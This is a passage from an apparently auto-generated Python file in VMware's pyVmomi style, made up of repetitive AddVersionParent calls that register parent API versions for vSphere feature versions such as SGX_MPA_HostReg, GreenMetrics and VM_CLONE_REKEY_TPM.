    "vim.version.VM_CLONE_REKEY_TPM",
    "vim.version.FCD_CATALOG_HEALTH",
    "vim.version.smartnic_vc",
    "vim.version.HWv20",
    "vim.version.unstable",
    "vim.version.FT_DRS_METRO_CLUSTER",
    "vim.version.VSAN_DeltaCompEnsureDurability",
    "vim.version.bmcInfo",
    "vim.version.vHT",
    "vim.version.ClusterConfigManagerV2",
    "vim.version.smartnic_network",
    "vim.version.DVX",
    "vim.version.VmcExternalStorageSupport",
    "vim.version.PodVMOnVDS",
    "vim.version.ClusterConfigManagerTransition",
    "vim.version.LiveUpdate",
    "vim.version.Vmfs_Unmap_Ultralow_Rate",
    "vim.version.VMcrypt3_KeyCustomAttribute",
    "vim.version.E2ENativeNVMeSupport",
    "vim.version.FCD_PERFORMANCE",
    "vim.version.SPBM_DISK_PROV_VIA_POLICY",
    "vim.version.nsx_uens_u2",
):
    AddVersionParent("dp.version.unstable", _parentVersion)
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version4")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version3")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.version.version0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v6_9_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v6_8_7")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version13")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version14")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version15")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version10")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version11")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version12")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version8")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version9")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version6")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version7")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version4")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version5")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version3")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.SGX_MPA_HostReg")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version4")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version3")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.GreenMetrics", "vmodl.version.version0")
AddVersionParent("vim.version.GreenMetrics", "vmodl.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vmodl.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v6_9_1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v6_8_7")
AddVersionParent("vim.version.GreenMetrics", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version13")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version14")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version15")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version10")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version11")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version12")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version8")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version9")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version6")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version7")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version4")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version5")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version3")
AddVersionParent("vim.version.GreenMetrics", "vim.version.GreenMetrics")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version4")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version3")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.version.version0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v6_9_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v6_8_7")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version13")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version14")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version15")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version10")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version11")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version12")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version8")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version9")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version6")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version7")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version4")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version5")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version3")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.hostVendorSpecificStatus")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.version.version0")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version13")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version14")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version15")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version10")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version11")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version12")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version8")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version9")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version6")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version7")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version4")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version5")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version3")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.VMcrypt_V4")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version4")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version3")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hostAccessManager", "vmodl.version.version0")
AddVersionParent("vim.version.hostAccessManager", "vmodl.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vmodl.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v6_9_1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v6_8_7")
AddVersionParent("vim.version.hostAccessManager", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version13")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version14")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version15")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version10")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version11")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version12")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version8")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version9")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version6")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version7")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version4")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version5")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version3")
AddVersionParent("vim.version.hostAccessManager", "vim.version.hostAccessManager")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version4")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version3")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.version.version0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v6_9_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v6_8_7")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version13")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version14")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version15")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version10")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version11")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version12")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version8")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version9")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version6")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version7")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version4")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version5")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version3")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version4")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version3")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.version.version0")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "dp.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version13")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version14")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version15")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version10")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version11")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version12")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version8")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version9")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version6")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version7")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version4")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version5")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version3")
AddVersionParent("dp.version.v8_0_0_0", "dp.version.v8_0_0_0")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version4")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version3")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VirtualTopo", "vmodl.version.version0")
AddVersionParent("vim.version.VirtualTopo", "vmodl.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vmodl.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v6_9_1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v6_8_7")
AddVersionParent("vim.version.VirtualTopo", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version13")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version14")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version15")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version10")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version11")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version12")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version8")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version9")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version6")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version7")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version4")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version5")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version3")
AddVersionParent("vim.version.VirtualTopo", "vim.version.VirtualTopo")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version4")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version3")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.version.version0")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v6_9_1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v6_8_7")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version13")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version14")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version15")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version10")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version11")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version12")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version8")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version9")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version6")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version7")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version4")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version5")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version3")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.Tools_Update_Health")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version4")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version3")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.version.version0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v6_9_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v6_8_7")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version13")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version14")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version15")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version10")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version11")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version12")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version8")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version9")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version6")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version7")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version4")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version5")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version3")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.CPU_Scheduler_Info")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version4")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version3")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.version.version0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v6_9_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v6_8_7")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version13")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version14")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version15")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version10")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version11")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version12")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version8")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version9")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version6")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version7")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version4")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version5")
